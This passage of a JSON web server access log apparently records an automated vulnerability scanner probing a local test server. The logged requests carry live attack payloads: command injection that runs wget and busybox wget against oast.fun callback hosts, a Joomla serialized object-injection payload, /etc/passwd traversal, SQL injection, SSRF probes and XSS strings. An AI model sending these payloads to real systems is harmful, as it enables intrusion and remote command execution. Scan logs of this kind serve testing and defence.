Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hui/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sensorlist.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/ui/auth/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Umbraco/feedproxy.aspx?url=http://ca285tosmpvbafqg07h01y6ayedctmfgr.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/woocommerce/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/detail.php?subdomain=ca285tosmpvbafqg07h0pckaj4g4w16eq.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar/admin/cal_login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://ca285tosmpvbafqg07h0brpcpbdrxerd9.oast.fun`;busybox wget http://ca285tosmpvbafqg07h0mgf4myrhms9u6.oast.fun&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /laravel-graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htmlcode/html/indexdefault.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"29KAY2SrSgIgCliypQU6glSdZ4z","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /fileserver/test.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wfc/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ContactAdministrators!default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jw/web/; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbaas_monitor/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/get.php?subdomain=ca285tosmpvbafqg07h0q7szos1jbn8kt.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zentao/index.php?mode=getconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://ca285tosmpvbafqg07h0ppcb4x1xz85bo.oast.fun`;wget http://ca285tosmpvbafqg07h049actmteqc6oa.oast.fun&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /trace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"{\x22query\x22:\x22query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\x5C\x22all_p99\x5C\x22,id:\x5C\x22') UNION SELECT 1,CONCAT('~','9999999999','~')-- \x5C\x22,}, duration: $d){values{value}}}\x22,\x22variables\x22:{\x22d\x22:{\x22start\x22:\x222021-11-11\x22,\x22end\x22:\x222021-11-12\x22,\x22step\x22:\x22DAY\x22}}}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/guestimage.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /action/usermanager.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fileserver/test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"\x5Cx00", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=ca285tosmpvbafqg07h0bgg78a7b6ryug.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wlsecurity.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /portal-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"userName=admin&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xxl-job-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 